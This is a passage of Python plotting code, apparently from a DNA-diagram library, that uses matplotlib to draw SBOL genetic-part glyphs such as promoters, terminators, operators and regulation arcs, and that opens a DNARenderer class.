top1x = start - indent_fac
top1y = y_extent - indent_fac
top2x = start - cross_width
top2y = y_extent - indent_fac
bot1x = start - indent_fac
bot1y = -y_extent + indent_fac
bot2x = start - cross_width
bot2y = -y_extent + indent_fac
lcross1 = Line2D([top1x,bot2x],[top1y,bot2y],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
lcross2 = Line2D([top2x,bot1x],[top2y,bot1y],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(lcross1)
ax.add_line(lcross2)
lsign = Line2D([bot2x-indent_fac,end+indent_fac],[y_extent-indent_fac,y_extent-indent_fac],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(lsign)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_restriction_site (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL restriction site renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 4.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start + linewidth
final_end = end+end_pad
l1 = Line2D([start,start],[-y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(l1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_spacer (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL spacer renderer.
"""
# Default options
zorder_add = 0.0
color = (1,1,1)
edgecolor = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 6.0
y_extent = 6.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'edgecolor' in list(opts.keys()):
edgecolor = opts['edgecolor']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
rbs_center = (start+((end-start)/2.0),0)
center_x = start+(end-start)/2.0
radius = x_extent/2
delta = radius - 0.5 * radius * math.sqrt(2)
l1 = Line2D([start+delta,end-delta],[radius-delta,-1*radius+delta],
linewidth=linewidth, color=edgecolor, zorder=12+zorder_add, linestyle=linestyle)
l2 = Line2D([start+delta,end-delta],[-1*radius+delta,radius-delta],
linewidth=linewidth, color=edgecolor, zorder=12+zorder_add, linestyle=linestyle)
c1 = Circle(rbs_center, x_extent/2.0, linewidth=linewidth, edgecolor=edgecolor,
facecolor=color, zorder=12+zorder_add)
ax.add_patch(c1)
ax.add_line(l1)
ax.add_line(l2)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_origin (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL origin renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 10.0
y_extent = 10.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
ori_center = (start+((end-start)/2.0),0)
c1 = Circle(ori_center, x_extent/2.0, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=12+zorder_add)
ax.add_patch(c1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_operator (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL operator renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 6.0
y_extent = 3.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=(0,0,0), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_insulator (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL insulator renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 8.0
y_extent = 4.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=(0,0,0), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
bits = 5.0
gap_size = ((end-start)/bits)
x_inset_start = start + gap_size
x_inset_end = start + ((bits-1.0)*gap_size)
# Inside rectangle
p2 = Polygon([(x_inset_start, y_extent-gap_size),
(x_inset_start, -y_extent+gap_size),
(x_inset_end, -y_extent+gap_size),
(x_inset_end, y_extent-gap_size)],
edgecolor=(0,0,0), facecolor=(1,1,1), linewidth=linewidth, zorder=12+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
ax.add_patch(p2)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
# Not used at present
def temporary_repressor (ax, type, num, start, end, prev_end, scale, linewidth, opts):
# Default options
zorder_add = 0.0
color = (0.7,0.7,0.7)
start_pad = 2.0
end_pad = 2.0
y_extent = 10
x_extent = 10
arrowhead_height = 2
arrowhead_length = 4
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
dir_fac = 1.0
final_end = end
final_start = prev_end
if start > end:
dir_fac = -1.0
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
e1center = (start+((end-start)/2.0),0)
e2center = (start+((end-start)/2.0)+x_extent/3.75,0)
e1 = Ellipse(e1center, y_extent/2, y_extent, edgecolor=(0,0,0), facecolor=color,
linewidth=linewidth, fill=True, zorder=12+zorder_add)
e2 = Ellipse(e2center, y_extent/2, y_extent, edgecolor=(0,0,0), facecolor=color,
linewidth=linewidth, fill=True, zorder=11+zorder_add)
ax.add_patch(e1)
ax.add_patch(e2)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
###############################################################################
# Regulation renderers
###############################################################################
def repress (ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts):
""" Standard repression regulation renderer.
"""
regulation(ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts)
def induce (ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts):
""" Standard induction regulation renderer.
"""
regulation(ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts)
def connect (ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts):
""" Standard induction regulation renderer.
"""
regulation(ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts)
def regulation (ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts):
""" General function for drawing regulation arcs.
"""
color = (0.0,0.0,0.0)
arrowhead_length = 3
linestyle = '-'
arcHeightConst = 15
arcHeightSpacing = 5
arcHeightStart = 10
arcHeight = arcHeightConst + arc_height_index*arcHeightSpacing
arcHeightEnd = arcHeightStart*1.5
arc_start_x_offset = 0.0
arc_end_x_offset = 0.0
# Reset defaults if provided
if opts != None:
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'color' in list(opts.keys()):
color = opts['color']
if 'arc_height' in list(opts.keys()):
arcHeight = opts['arc_height']
if 'arc_height_const' in list(opts.keys()):
arcHeightConst = opts['arc_height_const']
if 'arc_height_spacing' in list(opts.keys()):
arcHeightSpacing = opts['arc_height_spacing']
if 'arc_height_start' in list(opts.keys()):
arcHeightStart = opts['arc_height_start']
if 'arc_height_end' in list(opts.keys()):
arcHeightEnd = opts['arc_height_end']
if 'arc_start_x_offset' in list(opts.keys()):
arc_start_x_offset = opts['arc_start_x_offset']
if 'arc_end_x_offset' in list(opts.keys()):
arc_end_x_offset = opts['arc_end_x_offset']
if opts == None or 'arc_height' not in list(opts.keys()):
arcHeight = arcHeightConst + arc_height_index*arcHeightSpacing
startHeight = arcHeightStart
start = ((from_part['start'] + from_part['end']) / 2) + arc_start_x_offset
end = ((to_part['start'] + to_part['end']) / 2) + arc_end_x_offset
top = arcHeight;
base = startHeight;
indHeight = arrowhead_length
corr = linewidth
if to_part['fwd'] == False:
base = -1*startHeight
arcHeightEnd = -arcHeightEnd
top = -1*arcHeight
indHeight = -1*arrowhead_length
corr *= -1
line_away = Line2D([start,start],[base,top],
linewidth=linewidth, color=color, zorder=12, linestyle=linestyle)
line_across = Line2D([start,end],[top,top],
linewidth=linewidth, color=color, zorder=12, linestyle=linestyle)
line_toward = Line2D([end,end],[top,arcHeightEnd+corr],
linewidth=linewidth, color=color, zorder=12, linestyle=linestyle)
line_rep = Line2D([end-arrowhead_length,end+arrowhead_length],[arcHeightEnd,arcHeightEnd],
linewidth=linewidth, color=color, zorder=12, linestyle='-')
line_ind1 = Line2D([end-arrowhead_length,end],[arcHeightEnd+indHeight,arcHeightEnd],
linewidth=linewidth, color=color, zorder=12, linestyle='-')
line_ind2 = Line2D([end+arrowhead_length,end],[arcHeightEnd+indHeight,arcHeightEnd],
linewidth=linewidth, color=color, zorder=12, linestyle='-')
if(type == 'Repression'):
ax.add_line(line_rep)
ax.add_line(line_away)
ax.add_line(line_across)
ax.add_line(line_toward)
if(type == 'Activation'):
ax.add_line(line_ind1)
ax.add_line(line_ind2)
ax.add_line(line_away)
ax.add_line(line_across)
ax.add_line(line_toward)
if(type == 'Connection'):
verts = [ (start, base), (start, top), (end, top), (end, base) ]
codes = [Path.MOVETO, Path.CURVE4, Path.CURVE4, Path.CURVE4]
path1 = Path(verts, codes)
patch = patches.PathPatch(path1, facecolor='none', lw=linewidth, edgecolor=color)
ax.add_patch(patch)
###############################################################################
# Trace Icon Renderers (icon width corrisponds to trace data)
###############################################################################
def trace_promoter_start (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based promoter renderer.
"""
# Default options
zorder_add = 0.0
color = (0.0,0.0,1.0)
y_offset = 0.0
y_extent = 6.0
x_extent = 30.0
arrowhead_height = 0.5
arrowhead_length = 15.0
highlight_y_extent = 0.8
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'highlight_y_extent' in list(opts.keys()):
highlight_y_extent = opts['highlight_y_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
y_offset = -y_offset
# Draw the promoter symbol
l1 = Line2D([start_bp,start_bp],[0+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth,
color=color, zorder=14+zorder_add)
l2 = Line2D([start_bp,start_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*0.5*scale],
[dir_fac*y_extent+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth,
color=color, zorder=14+zorder_add)
ax.add_line(l1)
ax.add_line(l2)
p1 = Polygon([(start_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*scale,
dir_fac*y_extent+(arrowhead_height)+y_offset),
(start_bp+dir_fac*(x_extent*scale), dir_fac*y_extent+y_offset),
(start_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*scale,
dir_fac*y_extent-(arrowhead_height)+y_offset)],
facecolor=color, edgecolor=color, linewidth=linewidth, zorder=14+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
# Shade the promoter area (normally smaller than symbol extent)
p2 = Polygon([(start_bp, -highlight_y_extent+y_offset),
(start_bp, highlight_y_extent+y_offset),
(end_bp, highlight_y_extent+y_offset),
(end_bp, -highlight_y_extent+y_offset)], facecolor=color, edgecolor=color, linewidth=linewidth, zorder=14+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p2)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
def trace_promoter (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based promoter renderer with arrow at TSS.
"""
# Default options
zorder_add = 0.0
color = (0.0,0.0,1.0)
y_offset = 0.0
y_extent = 6.0
x_extent = 30.0
arrowhead_height = 0.5
arrowhead_length = 15.0
highlight_y_extent = 0.8
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'highlight_y_extent' in list(opts.keys()):
highlight_y_extent = opts['highlight_y_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
y_offset = -y_offset
# Draw the promoter symbol
l1 = Line2D([end_bp,end_bp],[0+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth,
color=color, zorder=14+zorder_add)
l2 = Line2D([end_bp,end_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*0.5*scale],
[dir_fac*y_extent+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth,
color=color, zorder=14+zorder_add)
ax.add_line(l1)
ax.add_line(l2)
p1 = Polygon([(end_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*scale,
dir_fac*y_extent+(arrowhead_height)+y_offset),
(end_bp+dir_fac*(x_extent*scale), dir_fac*y_extent+y_offset),
(end_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*scale,
dir_fac*y_extent-(arrowhead_height)+y_offset)],
facecolor=color, edgecolor=color, linewidth=linewidth, zorder=14+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
# Shade the promoter area (normally smaller than symbol extent)
p2 = Polygon([(start_bp, -highlight_y_extent+y_offset),
(start_bp, highlight_y_extent+y_offset),
(end_bp, highlight_y_extent+y_offset),
(end_bp, -highlight_y_extent+y_offset)], facecolor=color, edgecolor=color, linewidth=linewidth, zorder=14+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p2)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
def trace_rbs (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based ribosome binding site renderer.
"""
# Default options
zorder_add = 0.0
color = (0.16,0.68,0.15)
y_offset = 0.0
y_extent = 3.5
x_extent = 10.0
highlight_y_extent = 0.8
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'highlight_y_extent' in list(opts.keys()):
highlight_y_extent = opts['highlight_y_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
# Draw the RBS symbol
l1 = Line2D([start_bp,start_bp],[0+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth, color=color, zorder=14+zorder_add)
ax.add_line(l1)
c1 = Ellipse((start_bp,dir_fac*y_extent+y_offset),width=(x_extent*scale),height=y_extent*0.4,color=color, zorder=14+zorder_add)
ax.add_artist(c1)
# Shade the promoter area (normally smaller than symbol extent)
p2 = Polygon([(start_bp, -highlight_y_extent+y_offset),
(start_bp, highlight_y_extent+y_offset),
(end_bp, highlight_y_extent+y_offset),
(end_bp, -highlight_y_extent+y_offset)], facecolor=color, edgecolor=color, linewidth=linewidth, zorder=14+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p2)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
def trace_user_defined (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based user defined region renderer.
"""
# Default options
zorder_add = 0.0
color = (0.7,0.7,0.7)
hatch = ''
y_offset = 0.0
y_extent = 1.5
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'hatch' in list(opts.keys()):
hatch = opts['hatch']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
# Draw the CDS symbol
p1 = Polygon([(start_bp, y_extent+y_offset),
(start_bp, -y_extent+y_offset),
(end_bp-dir_fac*scale, -y_extent+y_offset),
(end_bp-dir_fac*scale, y_extent+y_offset)],
edgecolor=(0.0,0.0,0.0), facecolor=color, linewidth=linewidth,
hatch=hatch, zorder=15+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
def trace_cds (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based coding sequence renderer.
"""
# Default options
zorder_add = 0.0
color = (0.7,0.7,0.7)
hatch = ''
y_offset = 0.0
y_extent = 1.5
arrowhead_height = 1.0
arrowhead_length = 30.0
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'hatch' in list(opts.keys()):
hatch = opts['hatch']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
# Draw the CDS symbol
p1 = Polygon([(start_bp, y_extent+y_offset),
(start_bp, -y_extent+y_offset),
(end_bp-dir_fac*arrowhead_length*scale, -y_extent+y_offset),
(end_bp-dir_fac*arrowhead_length*scale, -y_extent-arrowhead_height+y_offset),
(end_bp, 0+y_offset),
(end_bp-dir_fac*arrowhead_length*scale, y_extent+arrowhead_height+y_offset),
(end_bp-dir_fac*arrowhead_length*scale, y_extent+y_offset)],
edgecolor=(0.0,0.0,0.0), facecolor=color, linewidth=linewidth,
hatch=hatch, zorder=15+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
def trace_terminator (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based terminator renderer.
"""
# Default options
zorder_add = 0.0
color = (1.0,0.0,0.0)
y_offset = 0.0
y_extent = 3.5
x_extent = 10.0
highlight_y_extent = 0.8
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'highlight_y_extent' in list(opts.keys()):
highlight_y_extent = opts['highlight_y_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
# Draw the terminator symbol
l1 = Line2D([start_bp,start_bp],[0+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth, color=color, zorder=8+zorder_add)
l2 = Line2D([start_bp-(x_extent*scale),start_bp+(x_extent*scale)],[dir_fac*y_extent+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth, color=color, zorder=14+zorder_add)
ax.add_line(l1)
ax.add_line(l2)
# Shade the terminator area (normally smaller than symbol extent)
p2 = Polygon([(start_bp, -highlight_y_extent+y_offset),
(start_bp, highlight_y_extent+y_offset),
(end_bp, highlight_y_extent+y_offset),
(end_bp, -highlight_y_extent+y_offset)], facecolor=color, edgecolor=color, linewidth=linewidth, zorder=13,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p2)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
###############################################################################
# The DNA renderer
###############################################################################
class DNARenderer:
""" Class defining the DNA rendering funtionality.
"""
# Standard part types
STD_PART_TYPES = ['Promoter',
'CDS',
'Terminator',
'RBS',
'Scar',
'Spacer',
'EmptySpace',
'Ribozyme',
'Ribonuclease',
'Protease',
'DNACleavageSite',
'RNACleavageSite',
'ProteinCleavageSite',
'DNALocation',
'RNALocation',
'ProteinLocation',
'DNAStability',
'RNAStability',
'ProteinStability',
'StemTop',
'Operator',
'Origin',
'Insulator',
'5Overhang',
'3Overhang',
'RestrictionSite',
'BluntRestrictionSite',
'PrimerBindingSite',
'5StickyRestrictionSite',
'3StickyRestrictionSite',
'UserDefined',
'Signature']
# Standard regulatory types
STD_REG_TYPES = ['Repression',
'Activation',
'Connection']
def __init__(self, scale=1.0, linewidth=1.0, linecolor=(0,0,0),
backbone_pad_left=0.0, backbone_pad_right=0.0):
""" Constructor to generate an empty DNARenderer.
Parameters
----------
scale : float (default=1.0)
A scaling factor for the plot. Only used if rendering traces.
linewidth : float (default=1.0)
The default linewidth for all part drawing.
backbone_pad_left : float (default=0.0)
Padding to add to the left side of the backbone.
backbone_pad_right : float (default=0.0)
Padding to add to the left side of the backbone.
"""
self.scale = scale
self.linewidth = linewidth
self.linecolor = linecolor
